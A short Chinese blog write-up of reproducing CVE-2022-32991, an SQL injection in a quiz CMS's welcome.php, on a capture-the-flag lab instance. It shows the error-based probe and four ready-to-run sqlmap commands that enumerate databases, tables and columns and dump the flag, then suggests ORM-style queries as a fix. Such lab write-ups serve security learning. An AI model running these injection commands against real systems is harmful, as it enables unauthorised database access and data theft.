[漏洞复现-1]-优快云博客

CVE-2022-32991

该CMS的welcome.php中存在SQL注入攻击

在welcome.php页面中抓包，在包头发现很多参数

GET /welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34 HTTP/1.1

尝试1'测试SQL注入，在测试eid时出现报错

Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/welcome.php on line 98

判断大概率为SQL注入，sqlmap一把梭

# 爆库
python sqlmap.py -u "https://eci-2ze2zpbvgzn6jhbvozf2.cloudeci1.ichunqiu.com:80/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --cookie="PHPSESSID=78k1fqqp3hfqolcrarkn497nh6" --batch --dbs 

# 爆表
python sqlmap.py -u "https://eci-2ze2zpbvgzn6jhbvozf2.cloudeci1.ichunqiu.com:80/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --cookie="PHPSESSID=78k1fqqp3hfqolcrarkn497nh6" --batch -D "ctf" --tables

# 爆列
python sqlmap.py -u "https://eci-2ze2zpbvgzn6jhbvozf2.cloudeci1.ichunqiu.com:80/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --cookie="PHPSESSID=78k1fqqp3hfqolcrarkn497nh6" --batch -D "ctf" -T "flag" --columns

# 爆字段
python sqlmap.py -u "https://eci-2ze2zpbvgzn6jhbvozf2.cloudeci1.ichunqiu.com:80/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --cookie="PHPSESSID=78k1fqqp3hfqolcrarkn497nh6" --batch -D "ctf" -T "flag" -C "flag" --dump

最后拿到flag

代码方面，没有找到原版代码。推测代码是将用户输入直接拼接到SQL查询中并且未进行任何过滤。

写相关代码可以使用类似ORM的方式操作数据库